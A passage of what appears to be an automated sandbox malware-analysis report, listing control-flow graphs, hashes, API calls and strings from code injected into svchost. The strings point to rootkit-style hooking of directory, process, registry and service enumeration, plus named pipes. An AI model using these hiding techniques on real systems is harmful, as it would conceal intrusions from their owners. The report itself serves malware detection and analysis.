                                                        control_flow_graph 108 1fb5399273c-1fb539927a4 call 1fb539929d4 * 4 117 1fb539927aa-1fb539927ad 108->117 118 1fb539929b2 108->118 117->118 119 1fb539927b3-1fb539927b6 117->119 120 1fb539929b4-1fb539929d0 118->120 119->118 121 1fb539927bc-1fb539927bf 119->121 121->118 122 1fb539927c5-1fb539927e6 121->122 122->118 124 1fb539927ec-1fb5399280c 122->124 125 1fb53992838-1fb5399283f 124->125 126 1fb5399280e-1fb53992836 124->126 127 1fb53992845-1fb53992852 125->127 128 1fb539928df-1fb539928e6 125->128 126->125 126->126 127->128 131 1fb53992858-1fb5399286a LoadLibraryA 127->131 129 1fb539928ec-1fb53992901 128->129 130 1fb53992992-1fb539929b0 128->130 129->130 132 1fb53992907 129->132 130->120 133 1fb539928ca-1fb539928d2 131->133 134 1fb5399286c-1fb53992878 131->134 137 1fb5399290d-1fb53992921 132->137 133->131 135 1fb539928d4-1fb539928d9 133->135 138 1fb539928c5-1fb539928c8 134->138 135->128 140 1fb53992923-1fb53992934 137->140 141 1fb53992982-1fb5399298c 137->141 138->133 139 1fb5399287a-1fb5399287d 138->139 145 1fb539928a7-1fb539928b7 139->145 146 1fb5399287f-1fb539928a5 139->146 143 1fb53992936-1fb5399293d 140->143 144 1fb5399293f-1fb53992943 140->144 141->130 141->137 147 1fb53992970-1fb53992980 143->147 148 1fb53992945-1fb5399294b 144->148 149 1fb5399294d-1fb53992951 144->149 150 1fb539928ba-1fb539928c1 145->150 146->150 147->140 147->141 148->147 151 1fb53992963-1fb53992967 149->151 152 1fb53992953-1fb53992961 149->152 150->138 151->147 154 1fb53992969-1fb5399296c 151->154 152->147 154->147
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797512847.000001FB53990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB53990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb53990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction ID: 61dd91bc6a25e48f392e8f6ba260480b8200c95b887252fc9720a6961359b089
                                                        • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction Fuzzy Hash: A661F1B3B0A69987DB548F15D1A07B9B39AF754BA4F1C8131DE9A03798DB38DC52CB00

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 351 1fb539c2b2c-1fb539c2ba5 call 1fb539e2ce0 354 1fb539c2ee0-1fb539c2f03 351->354 355 1fb539c2bab-1fb539c2bb1 351->355 355->354 356 1fb539c2bb7-1fb539c2bba 355->356 356->354 357 1fb539c2bc0-1fb539c2bc3 356->357 357->354 358 1fb539c2bc9-1fb539c2bd9 GetModuleHandleA 357->358 359 1fb539c2bdb-1fb539c2beb GetProcAddress 358->359 360 1fb539c2bed 358->360 361 1fb539c2bf0-1fb539c2c0e 359->361 360->361 361->354 363 1fb539c2c14-1fb539c2c33 StrCmpNIW 361->363 363->354 364 1fb539c2c39-1fb539c2c3d 363->364 364->354 365 1fb539c2c43-1fb539c2c4d 364->365 365->354 366 1fb539c2c53-1fb539c2c5a 365->366 366->354 367 1fb539c2c60-1fb539c2c73 366->367 368 1fb539c2c83 367->368 369 1fb539c2c75-1fb539c2c81 367->369 370 1fb539c2c86-1fb539c2c8a 368->370 369->370 371 1fb539c2c9a 370->371 372 1fb539c2c8c-1fb539c2c98 370->372 373 1fb539c2c9d-1fb539c2ca7 371->373 372->373 374 1fb539c2d9d-1fb539c2da1 373->374 375 1fb539c2cad-1fb539c2cb0 373->375 376 1fb539c2da7-1fb539c2daa 374->376 377 1fb539c2ed2-1fb539c2eda 374->377 378 1fb539c2cc2-1fb539c2ccc 375->378 379 1fb539c2cb2-1fb539c2cbf call 1fb539c199c 375->379 380 1fb539c2dbb-1fb539c2dc5 376->380 381 1fb539c2dac-1fb539c2db8 call 1fb539c199c 376->381 377->354 377->367 383 1fb539c2d00-1fb539c2d0a 378->383 384 1fb539c2cce-1fb539c2cdb 378->384 379->378 388 1fb539c2dc7-1fb539c2dd4 380->388 389 1fb539c2df5-1fb539c2df8 380->389 381->380 385 1fb539c2d3a-1fb539c2d3d 383->385 386 1fb539c2d0c-1fb539c2d19 383->386 384->383 391 1fb539c2cdd-1fb539c2cea 384->391 393 1fb539c2d3f-1fb539c2d49 call 1fb539c1bbc 385->393 394 1fb539c2d4b-1fb539c2d58 lstrlenW 385->394 386->385 392 1fb539c2d1b-1fb539c2d28 386->392 388->389 396 1fb539c2dd6-1fb539c2de3 388->396 397 1fb539c2dfa-1fb539c2e03 call 1fb539c1bbc 389->397 398 1fb539c2e05-1fb539c2e12 lstrlenW 389->398 399 1fb539c2ced-1fb539c2cf3 391->399 402 1fb539c2d2b-1fb539c2d31 392->402 393->394 409 1fb539c2d93-1fb539c2d98 393->409 404 1fb539c2d5a-1fb539c2d64 394->404 405 1fb539c2d7b-1fb539c2d8d call 1fb539c3844 394->405 406 1fb539c2de6-1fb539c2dec 396->406 397->398 416 1fb539c2e4a-1fb539c2e55 397->416 400 1fb539c2e14-1fb539c2e1e 398->400 401 1fb539c2e35-1fb539c2e3f call 1fb539c3844 398->401 408 1fb539c2cf9-1fb539c2cfe 399->408 399->409 400->401 410 1fb539c2e20-1fb539c2e33 call 1fb539c152c 400->410 411 1fb539c2e42-1fb539c2e44 401->411 402->409 412 1fb539c2d33-1fb539c2d38 402->412 404->405 415 1fb539c2d66-1fb539c2d79 call 1fb539c152c 404->415 405->409 405->411 406->416 417 1fb539c2dee-1fb539c2df3 406->417 408->383 408->399 409->411 410->401 410->416 411->377 411->416 412->385 412->402 415->405 415->409 422 1fb539c2e57-1fb539c2e5b 416->422 423 1fb539c2ecc-1fb539c2ed0 416->423 417->389 417->406 427 1fb539c2e63-1fb539c2e7d call 1fb539c85c0 422->427 428 1fb539c2e5d-1fb539c2e61 422->428 423->377 430 1fb539c2e80-1fb539c2e83 427->430 428->427 428->430 433 1fb539c2e85-1fb539c2ea3 call 1fb539c85c0 430->433 434 1fb539c2ea6-1fb539c2ea9 430->434 433->434 434->423 436 1fb539c2eab-1fb539c2ec9 call 1fb539c85c0 434->436 436->423
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                        • API String ID: 2119608203-3850299575
                                                        • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction ID: 3ce0a275c11acc5e92f3c7ae4efb9db0a1a550ce48a5a8c3fee84c71d8458c05
                                                        • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction Fuzzy Hash: F1B191B221A69A82EF549F25D4907F9A3A6F748B84F4C5036DE8B677A4DF39CC40C340
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction ID: 489a7c68e5e93f2be97043befc8e533eee2d989b9a1ceb06d858f03c7cbb19f7
                                                        • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction Fuzzy Hash: 59311DB620AB858AEB609F61E8907ED7365F784744F48442ADB4E97BA4EF3CC548C710
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 1239891234-0
                                                        • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction ID: 6fdd1fba7bf15b503d1394c2c4db13ffaa122b827706bd4a70a70ebbee7c2285
                                                        • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction Fuzzy Hash: 29319376219F8586EB60CF25E8813EE73A1F789754F580125EA9E43B64DF3CC545CB00

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                        • String ID: d
                                                        • API String ID: 2005889112-2564639436
                                                        • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction ID: e0d383892e9437e16feb1cfbd0bccaab8c6993bef60af1a4249abde3c73bbe4e
                                                        • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction Fuzzy Hash: CF5160B6209B8686EB54CF62E4853AA77A2F789FC9F484534DE8A47728DF3CC045C700

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$AddressHandleModuleProc
                                                        • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                        • API String ID: 4175298099-1975688563
                                                        • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction ID: 6fe1454f222dbdc956f5aa37bac40278d1ba15de22a72ebfa92ae51e802ad3c4
                                                        • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction Fuzzy Hash: 1D314DF410AA4BA0FA04EF66E8D26F4A322AB44348F8C5433948B027769F7C8249D350

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 197 1fb53996910-1fb53996916 198 1fb53996918-1fb5399691b 197->198 199 1fb53996951-1fb5399695b 197->199 201 1fb53996945-1fb53996984 call 1fb53996fc0 198->201 202 1fb5399691d-1fb53996920 198->202 200 1fb53996a78-1fb53996a8d 199->200 206 1fb53996a9c-1fb53996ab6 call 1fb53996e54 200->206 207 1fb53996a8f 200->207 219 1fb5399698a-1fb5399699f call 1fb53996e54 201->219 220 1fb53996a52 201->220 204 1fb53996938 __scrt_dllmain_crt_thread_attach 202->204 205 1fb53996922-1fb53996925 202->205 208 1fb5399693d-1fb53996944 204->208 210 1fb53996927-1fb53996930 205->210 211 1fb53996931-1fb53996936 call 1fb53996f04 205->211 217 1fb53996ab8-1fb53996aed call 1fb53996f7c call 1fb53996e1c call 1fb53997318 call 1fb53997130 call 1fb53997154 call 1fb53996fac 206->217 218 1fb53996aef-1fb53996b20 call 1fb53997190 206->218 212 1fb53996a91-1fb53996a9b 207->212 211->208 217->212 229 1fb53996b22-1fb53996b28 218->229 230 1fb53996b31-1fb53996b37 218->230 232 1fb539969a5-1fb539969b6 call 1fb53996ec4 219->232 233 1fb53996a6a-1fb53996a77 call 1fb53997190 219->233 223 1fb53996a54-1fb53996a69 220->223 229->230 234 1fb53996b2a-1fb53996b2c 229->234 235 1fb53996b39-1fb53996b43 230->235 236 1fb53996b7e-1fb53996b94 call 1fb5399268c 230->236 250 1fb539969b8-1fb539969dc call 1fb539972dc call 1fb53996e0c call 1fb53996e38 call 1fb5399ac0c 232->250 251 1fb53996a07-1fb53996a11 call 1fb53997130 232->251 233->200 240 1fb53996c1f-1fb53996c2c 234->240 241 1fb53996b45-1fb53996b4d 235->241 242 1fb53996b4f-1fb53996b5d call 1fb539a5780 235->242 258 1fb53996b96-1fb53996b98 236->258 259 1fb53996bcc-1fb53996bce 236->259 247 1fb53996b63-1fb53996b78 call 1fb53996910 241->247 242->247 262 1fb53996c15-1fb53996c1d 242->262 247->236 247->262 250->251 300 1fb539969de-1fb539969e5 __scrt_dllmain_after_initialize_c 250->300 251->220 272 1fb53996a13-1fb53996a1f call 1fb53997180 251->272 258->259 267 1fb53996b9a-1fb53996bbc call 1fb5399268c call 1fb53996a78 258->267 260 1fb53996bd5-1fb53996bea call 1fb53996910 259->260 261 1fb53996bd0-1fb53996bd3 259->261 260->262 281 1fb53996bec-1fb53996bf6 260->281 261->260 261->262 262->240 267->259 293 1fb53996bbe-1fb53996bc6 call 1fb539a5780 267->293 289 1fb53996a45-1fb53996a50 272->289 290 1fb53996a21-1fb53996a2b call 1fb53997098 272->290 286 1fb53996bf8-1fb53996bff 281->286 287 1fb53996c01-1fb53996c11 call 1fb539a5780 281->287 286->262 287->262 289->223 290->289 299 1fb53996a2d-1fb53996a3b 290->299 293->259 299->289 300->251 301 1fb539969e7-1fb53996a04 call 1fb5399abc8 300->301 301->251
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797512847.000001FB53990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB53990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb53990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                        • API String ID: 190073905-1786718095
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: f6a05610631161f0791a0f46ca97f481bc5ebb53e9b00542c7e35bf7c6f5f54b
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: A3817EF370F28786FA509B65D4E13F96392A7857A0F5C4135AA47477B6EB3CC8458B00

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 304 1fb539cce28-1fb539cce4a GetLastError 305 1fb539cce69-1fb539cce74 FlsSetValue 304->305 306 1fb539cce4c-1fb539cce57 FlsGetValue 304->306 309 1fb539cce76-1fb539cce79 305->309 310 1fb539cce7b-1fb539cce80 305->310 307 1fb539cce59-1fb539cce61 306->307 308 1fb539cce63 306->308 311 1fb539cced5-1fb539ccee0 SetLastError 307->311 308->305 309->311 312 1fb539cce85 call 1fb539cd6cc 310->312 313 1fb539ccef5-1fb539ccf0b call 1fb539cc748 311->313 314 1fb539ccee2-1fb539ccef4 311->314 315 1fb539cce8a-1fb539cce96 312->315 328 1fb539ccf28-1fb539ccf33 FlsSetValue 313->328 329 1fb539ccf0d-1fb539ccf18 FlsGetValue 313->329 317 1fb539ccea8-1fb539cceb2 FlsSetValue 315->317 318 1fb539cce98-1fb539cce9f FlsSetValue 315->318 320 1fb539cceb4-1fb539ccec4 FlsSetValue 317->320 321 1fb539ccec6-1fb539cced0 call 1fb539ccb94 call 1fb539cd744 317->321 319 1fb539ccea1-1fb539ccea6 call 1fb539cd744 318->319 319->309 320->319 321->311 332 1fb539ccf98-1fb539ccf9f call 1fb539cc748 328->332 333 1fb539ccf35-1fb539ccf3a 328->333 330 1fb539ccf1a-1fb539ccf1e 329->330 331 1fb539ccf22 329->331 330->332 335 1fb539ccf20 330->335 331->328 337 1fb539ccf3f call 1fb539cd6cc 333->337 338 1fb539ccf8f-1fb539ccf97 335->338 340 1fb539ccf44-1fb539ccf50 337->340 341 1fb539ccf62-1fb539ccf6c FlsSetValue 340->341 342 1fb539ccf52-1fb539ccf59 FlsSetValue 340->342 344 1fb539ccf80-1fb539ccf8a call 1fb539ccb94 call 1fb539cd744 341->344 345 1fb539ccf6e-1fb539ccf7e FlsSetValue 341->345 343 1fb539ccf5b-1fb539ccf60 call 1fb539cd744 342->343 343->332 344->338 345->343
                                                        APIs
                                                        • GetLastError.KERNEL32 ref: 000001FB539CCE37
                                                        • FlsGetValue.KERNEL32(?,?,?,000001FB539D0A6B,?,?,?,000001FB539D045C,?,?,?,000001FB539CC84F), ref: 000001FB539CCE4C
                                                        • FlsSetValue.KERNEL32(?,?,?,000001FB539D0A6B,?,?,?,000001FB539D045C,?,?,?,000001FB539CC84F), ref: 000001FB539CCE6D
                                                        • FlsSetValue.KERNEL32(?,?,?,000001FB539D0A6B,?,?,?,000001FB539D045C,?,?,?,000001FB539CC84F), ref: 000001FB539CCE9A
                                                        • FlsSetValue.KERNEL32(?,?,?,000001FB539D0A6B,?,?,?,000001FB539D045C,?,?,?,000001FB539CC84F), ref: 000001FB539CCEAB
                                                        • FlsSetValue.KERNEL32(?,?,?,000001FB539D0A6B,?,?,?,000001FB539D045C,?,?,?,000001FB539CC84F), ref: 000001FB539CCEBC
                                                        • SetLastError.KERNEL32 ref: 000001FB539CCED7
                                                        • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001FB539D0A6B,?,?,?,000001FB539D045C,?,?,?,000001FB539CC84F), ref: 000001FB539CCF0D
                                                        • FlsSetValue.KERNEL32(?,?,00000001,000001FB539CECCC,?,?,?,?,000001FB539CBF9F,?,?,?,?,?,000001FB539C7AB0), ref: 000001FB539CCF2C
                                                          • Part of subcall function 000001FB539CD6CC: HeapAlloc.KERNEL32 ref: 000001FB539CD721
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001FB539D0A6B,?,?,?,000001FB539D045C,?,?,?,000001FB539CC84F), ref: 000001FB539CCF54
                                                          • Part of subcall function 000001FB539CD744: HeapFree.KERNEL32 ref: 000001FB539CD75A
                                                          • Part of subcall function 000001FB539CD744: GetLastError.KERNEL32 ref: 000001FB539CD764
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001FB539D0A6B,?,?,?,000001FB539D045C,?,?,?,000001FB539CC84F), ref: 000001FB539CCF65
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001FB539D0A6B,?,?,?,000001FB539D045C,?,?,?,000001FB539CC84F), ref: 000001FB539CCF76
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast$Heap$AllocFree
                                                        • String ID:
                                                        • API String ID: 570795689-0
                                                        • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction ID: 6d41343913785b7a6c2472a831a74eef6234c9dfd0991a1be6bdcb384e67cf70
                                                        • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction Fuzzy Hash: C8412BF020B24F42FA68A725D6D63F927435B857B0F5C0734A9374A7FADB2C98029A50

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                        • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                        • API String ID: 2171963597-1373409510
                                                        • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction ID: 03d7399eea3254e19b5d8266f2eebc46fa5138ef8e7893cb31c7892e277a4139
                                                        • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction Fuzzy Hash: C721567661974583FB10CB25F4853A977A2F789B94F584625DA9A03BB8CF3CC145CB00

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 449 1fb53999944-1fb539999ac call 1fb5399a814 452 1fb53999e13-1fb53999e1b call 1fb5399bb48 449->452 453 1fb539999b2-1fb539999b5 449->453 453->452 454 1fb539999bb-1fb539999c1 453->454 456 1fb539999c7-1fb539999cb 454->456 457 1fb53999a90-1fb53999aa2 454->457 456->457 461 1fb539999d1-1fb539999dc 456->461 459 1fb53999d63-1fb53999d67 457->459 460 1fb53999aa8-1fb53999aac 457->460 462 1fb53999d69-1fb53999d70 459->462 463 1fb53999da0-1fb53999daa call 1fb53998a34 459->463 460->459 464 1fb53999ab2-1fb53999abd 460->464 461->457 465 1fb539999e2-1fb539999e7 461->465 462->452 466 1fb53999d76-1fb53999d9b call 1fb53999e1c 462->466 463->452 476 1fb53999dac-1fb53999dcb call 1fb53996d40 463->476 464->459 468 1fb53999ac3-1fb53999aca 464->468 465->457 469 1fb539999ed-1fb539999f7 call 1fb53998a34 465->469 466->463 472 1fb53999c94-1fb53999ca0 468->472 473 1fb53999ad0-1fb53999b07 call 1fb53998e10 468->473 469->476 480 1fb539999fd-1fb53999a28 call 1fb53998a34 * 2 call 1fb53999124 469->480 472->463 477 1fb53999ca6-1fb53999caa 472->477 473->472 485 1fb53999b0d-1fb53999b15 473->485 482 1fb53999cba-1fb53999cc2 477->482 483 1fb53999cac-1fb53999cb8 call 1fb539990e4 477->483 517 1fb53999a48-1fb53999a52 call 1fb53998a34 480->517 518 1fb53999a2a-1fb53999a2e 480->518 482->463 484 1fb53999cc8-1fb53999cd5 call 1fb53998cb4 482->484 483->482 497 1fb53999cdb-1fb53999ce3 483->497 484->463 484->497 490 1fb53999b19-1fb53999b4b 485->490 494 1fb53999c87-1fb53999c8e 490->494 495 1fb53999b51-1fb53999b5c 490->495 494->472 494->490 495->494 498 1fb53999b62-1fb53999b7b 495->498 499 1fb53999df6-1fb53999e12 call 1fb53998a34 * 2 call 1fb5399baa8 497->499 500 1fb53999ce9-1fb53999ced 497->500 502 1fb53999c74-1fb53999c79 498->502 503 1fb53999b81-1fb53999bc6 call 1fb539990f8 * 2 498->503 499->452 504 1fb53999d00 500->504 505 1fb53999cef-1fb53999cfe call 1fb539990e4 500->505 508 1fb53999c84 502->508 530 1fb53999c04-1fb53999c0a 503->530 531 1fb53999bc8-1fb53999bee call 1fb539990f8 call 1fb5399a038 503->531 513 1fb53999d03-1fb53999d0d call 1fb5399a8ac 504->513 505->513 508->494 513->463 528 1fb53999d13-1fb53999d61 call 1fb53998d44 call 1fb53998f50 513->528 517->457 534 1fb53999a54-1fb53999a74 call 1fb53998a34 * 2 call 1fb5399a8ac 517->534 518->517 522 1fb53999a30-1fb53999a3b 518->522 522->517 527 1fb53999a3d-1fb53999a42 522->527 527->452 527->517 528->463 535 1fb53999c0c-1fb53999c10 530->535 536 1fb53999c7b 530->536 550 1fb53999c15-1fb53999c72 call 1fb53999870 531->550 551 1fb53999bf0-1fb53999c02 531->551 555 1fb53999a76-1fb53999a80 call 1fb5399a99c 534->555 556 1fb53999a8b 534->556 535->503 541 1fb53999c80 536->541 541->508 550->541 551->530 551->531 559 1fb53999a86-1fb53999def call 1fb539986ac call 1fb5399a3f4 call 1fb539988a0 555->559 560 1fb53999df0-1fb53999df5 call 1fb5399baa8 555->560 556->457 559->560 560->499
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797512847.000001FB53990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB53990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb53990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction ID: fa9bbf22c5165d2bb50162e04197a4c728e4534f610685b807383e084df18b8a
                                                        • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction Fuzzy Hash: 5FE1A2B360A7428AFB60DF65D4D03ED77A6F749798F180125EE4A57BA5DB38C091CB00

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 570 1fb539ca544-1fb539ca5ac call 1fb539cb414 573 1fb539caa13-1fb539caa1b call 1fb539cc748 570->573 574 1fb539ca5b2-1fb539ca5b5 570->574 574->573 575 1fb539ca5bb-1fb539ca5c1 574->575 577 1fb539ca5c7-1fb539ca5cb 575->577 578 1fb539ca690-1fb539ca6a2 575->578 577->578 582 1fb539ca5d1-1fb539ca5dc 577->582 580 1fb539ca6a8-1fb539ca6ac 578->580 581 1fb539ca963-1fb539ca967 578->581 580->581 583 1fb539ca6b2-1fb539ca6bd 580->583 585 1fb539ca969-1fb539ca970 581->585 586 1fb539ca9a0-1fb539ca9aa call 1fb539c9634 581->586 582->578 584 1fb539ca5e2-1fb539ca5e7 582->584 583->581 587 1fb539ca6c3-1fb539ca6ca 583->587 584->578 588 1fb539ca5ed-1fb539ca5f7 call 1fb539c9634 584->588 585->573 589 1fb539ca976-1fb539ca99b call 1fb539caa1c 585->589 586->573 599 1fb539ca9ac-1fb539ca9cb call 1fb539c7940 586->599 591 1fb539ca894-1fb539ca8a0 587->591 592 1fb539ca6d0-1fb539ca707 call 1fb539c9a10 587->592 588->599 603 1fb539ca5fd-1fb539ca628 call 1fb539c9634 * 2 call 1fb539c9d24 588->603 589->586 591->586 596 1fb539ca8a6-1fb539ca8aa 591->596 592->591 608 1fb539ca70d-1fb539ca715 592->608 600 1fb539ca8ba-1fb539ca8c2 596->600 601 1fb539ca8ac-1fb539ca8b8 call 1fb539c9ce4 596->601 600->586 607 1fb539ca8c8-1fb539ca8d5 call 1fb539c98b4 600->607 601->600 614 1fb539ca8db-1fb539ca8e3 601->614 639 1fb539ca648-1fb539ca652 call 1fb539c9634 603->639 640 1fb539ca62a-1fb539ca62e 603->640 607->586 607->614 612 1fb539ca719-1fb539ca74b 608->612 616 1fb539ca887-1fb539ca88e 612->616 617 1fb539ca751-1fb539ca75c 612->617 619 1fb539ca8e9-1fb539ca8ed 614->619 620 1fb539ca9f6-1fb539caa12 call 1fb539c9634 * 2 call 1fb539cc6a8 614->620 616->591 616->612 617->616 621 1fb539ca762-1fb539ca77b 617->621 623 1fb539ca8ef-1fb539ca8fe call 1fb539c9ce4 619->623 624 1fb539ca900 619->624 620->573 625 1fb539ca874-1fb539ca879 621->625 626 1fb539ca781-1fb539ca7c6 call 1fb539c9cf8 * 2 621->626 634 1fb539ca903-1fb539ca90d call 1fb539cb4ac 623->634 624->634 630 1fb539ca884 625->630 651 1fb539ca7c8-1fb539ca7ee call 1fb539c9cf8 call 1fb539cac38 626->651 652 1fb539ca804-1fb539ca80a 626->652 630->616 634->586 648 1fb539ca913-1fb539ca961 call 1fb539c9944 call 1fb539c9b50 634->648 639->578 655 1fb539ca654-1fb539ca674 call 1fb539c9634 * 2 call 1fb539cb4ac 639->655 640->639 645 1fb539ca630-1fb539ca63b 640->645 645->639 647 1fb539ca63d-1fb539ca642 645->647 647->573 647->639 648->586 670 1fb539ca815-1fb539ca872 call 1fb539ca470 651->670 671 1fb539ca7f0-1fb539ca802 651->671 659 1fb539ca87b 652->659 660 1fb539ca80c-1fb539ca810 652->660 676 1fb539ca676-1fb539ca680 call 1fb539cb59c 655->676 677 1fb539ca68b 655->677 664 1fb539ca880 659->664 660->626 664->630 670->664 671->651 671->652 680 1fb539ca686-1fb539ca9ef call 1fb539c92ac call 1fb539caff4 call 1fb539c94a0 676->680 681 1fb539ca9f0-1fb539ca9f5 call 